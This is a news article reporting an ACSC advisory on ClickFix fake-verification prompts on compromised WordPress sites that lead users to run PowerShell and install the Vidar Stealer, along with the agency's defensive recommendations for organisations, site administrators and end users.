“The Australian Signals Directorate’s Australian Cyber Security Center (ASD's ACSC) has observed ClickFix-associated activity leveraging WordPress-hosted infrastructure to distribute the Vidar Stealer malware,” the agency warned in its advisory.
ClickFix social engineering technique
ClickFix is a social engineering method that relies on deceiving users into executing commands themselves. The campaign described by the Australian Cyber Security Center (ACSC) typically presents visitors with fake CAPTCHA or browser verification prompts on compromised or malicious websites. Those prompts instruct users to copy and manually run PowerShell commands, which are then used to bypass security controls and deliver malware—most often information-stealers.
Compromised WordPress sites and fake Cloudflare prompts
According to the ACSC advisory, attackers are using WordPress-hosted infrastructure as the initial distribution point. Compromised WordPress websites redirect visitors to payloads that display what appears to be a legitimate Cloudflare verification or CAPTCHA prompt. The malicious prompt tells the user to copy a PowerShell command and execute it on their system; following that instruction leads to a Vidar Stealer infection.
Vidar Stealer: capabilities, delivery and evasions
Vidar Stealer is an information-stealing malware family and a malware-as-a-service (MaaS) operation that first appeared in late 2018. The ACSC notes several characteristics that explain its continued appeal to cybercriminals: it is relatively inexpensive to use, simple to deploy, and capable of collecting a broad range of data. Observed targets include browser passwords, cookies, cryptocurrency wallets, autofill information and system details.
Operationally, Vidar reduces forensic traces by deleting its executable after launch and running from system memory. For command-and-control resolution it has been observed to use “dead-drop” URLs hosted on public services such as Telegram bots and Steam profiles. The advisory also states that Vidar has been promoted through multiple channels—examples cited include Windows fixes, TikTok videos and GitHub—and that the developer released a new version with upgraded capabilities last year.
ACSC mitigation advice and available indicators
The ACSC recommends concrete defensive measures aimed at the specific mechanics of ClickFix and Vidar. For organizations, the agency advises restricting PowerShell execution and implementing application allow-listing to reduce the risk from attacks that rely on user-run commands and on living-off-the-land execution. For WordPress site administrators, the ACSC specifically recommends applying available security updates for themes and add-ons and removing any unused themes or plugins from their platforms.
The ACSC bulletin also provides indicators of compromise (IoCs) to allow organizations and defenders to detect intrusions or to tune controls against the observed activity.
What this means for technologists, WordPress administrators, and end users
- Technologists and security teams: Treat PowerShell usage and process execution as a control point—restricting PowerShell execution and using application allow-listing are the ACSC’s recommended countermeasures. Use the ACSC-provided IoCs to hunt for signs of compromise and to instrument detection rules.
- WordPress administrators: Prioritize patching of themes and plugins, remove unused extensions, and monitor for unexpected redirects that could lead to fake verification prompts; the advisory ties compromised WordPress-hosted infrastructure directly to the distribution chain.
- End users and general staff: Be wary of any website that asks you to copy-and-paste a command into a terminal or PowerShell window—ClickFix-style prompts often masquerade as Cloudflare or CAPTCHA verifications and rely on users executing commands themselves.
The ACSC advisory sketches a straightforward but potent attack chain: compromised WordPress pages lead to fake verification prompts; social engineering convinces users to run PowerShell; Vidar executes from memory and reaches out for C2 via public dead-drops. The tools and tradecraft are not exotic, but they are effective—so the practical steps the ACSC recommends (restricting PowerShell, allow-listing, WordPress hygiene, and use of IoCs) are equally direct. Defenders who act on those specifics can close the narrow window that ClickFix exploits.
